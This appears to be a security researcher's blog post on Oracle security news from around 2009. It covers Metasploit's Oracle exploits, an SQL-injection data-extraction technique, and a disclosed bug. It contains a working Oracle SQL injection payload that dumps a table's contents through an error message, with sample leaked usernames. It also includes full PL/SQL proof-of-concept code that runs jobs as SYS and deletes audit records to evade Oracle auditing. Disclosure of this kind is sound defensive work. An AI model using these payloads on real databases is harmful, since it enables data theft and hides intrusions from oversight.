Chris Gates wrote on his blog that Metasploit contains now exploits for Oracle bugs which were fixed in October 2008 (lt.compress) and January 2009 CPU.
Metasploit is becoming more and more useful for Oracle pentester…
Daniel Kachakil released an interesting whitepaper about fast data extraction using SQL Injection and XML statements on SQL server and a tool implementing this technique called SFX-SQLI.
The paper describes how to retrieve data from a SQL Server database using SQL Injection and XML. This technique is not new (for me). I am using such techniques in the Oracle environment via xmltransform or stragg since a while. It is possible to retrieve the entire content of a table in a single error message…
More details will be available on the SQL Injection book I am currently writing with some other security researchers…
The tool SFX-SQLI implements the concept for SQL Server.
Here is one of the examples how to export an entire table, e.g. via utl_inaddr. The output is limited to 4000 byte:
or 1= utl_inaddr.get_host_name((select xmltransform(sys_xmlagg(sys_xmlgen(username)),xmltype(‚< ?xml version=“1.0″?>
Warning: ociexecute(): OCIStmtExecute: ORA-29257: host CUSTCOM_PROD;WEBTOOL;WEBDB;NELLDB;ERDB;B2B;BI;PM;SH;IX;OE;HR;SCOTT;MGMT_VIEW;MDDATA;SYSMAN;MDSYS;SI_INFORMTN_SCHEMA;ORDPLUGINS;ORDSYS;OLAPSYS;ANONYMOUS;XDB;CTXSYS;EXFSYS;WMSYS;DBSNMP;TSMSYS;DIP;OUTLN;SYSTEM;SYS; unknown ORA-06512: at „SYS.UTL_INADDR“, line 4 ORA-06512: at „SYS.UTL_INADDR“, line 35
Chris Gates has published a video where he shows how to attack Oracle with Metasploit from the Shmoocon 09 conference.
Even if the attacks were shown on an outdated version of Oracle (10.1.0.3) it’s good to see that the Oracle support in Metasploit is getting better…
Chris has an interesting blog called carnal0wnage.blogspot.com.
Here is the proof of concept code for the issue in dbms_ijob [CVE-2008-5437] from Volker Solinus, a really smart DBA, my former colleague from Oracle Consulting Germany.
A different bug concerning Auditing reported by us is still open. Oracle Auditing alone is not sufficient because there are various ways to bypass it. . Often it is better to use a 3rd-party solution like Hedgehog from Sentrigo.
— Bypassing Oracle Auditing
— Everything executed via dbms_ijob (granted to DBAs by default)
— will not appear in the Oracle auditing
— by Volker Solinus
declare
jj integer := 666666; — job number
begin
sys.dbms_ijob.submit(
JOB => jj,
LUSER => ‚SYS‘,
PUSER => ‚SYS‘,
CUSER => ‚SYS‘,
NEXT_DATE => sysdate,
INTERVAL => null,
BROKEN => false,
WHAT => ‚
declare
jj integer := ‚||jj||‘;
begin
execute immediate “alter system archive log current“;
sys.dbms_ijob.remove(jj);
delete from sys.aud$ where obj$name = “DBMS_IJOB“;
commit;
end;‘,
NLSENV => ‚NLS_LANGUAGE=“AMERICAN“ NLS_TERRITORY=“AMERICA“ NLS_CURRENCY=“$“ NLS_ISO_CURRENCY=“AMERICA“ NLS_NUMERIC_CHARACTERS=“.,“ NLS_DATE_FORMAT=“DD-MON-RR“ NLS_DATE_LANGUAGE=“AMERICAN“ NLS_SORT=“BINARY“‘,
ENV => hextoraw(‚0102000200000000‘));
sys.dbms_ijob.run(jj);
exception when others then
if sqlcode=-12011 then
sys.dbms_ijob.remove(jj);
end if;
raise;
end;
/
After applying the January CPU 2009 you will get the following error message:
ERROR at line 1:
ORA-12718: operation requires connection as SYS
ORA-06512: at line 32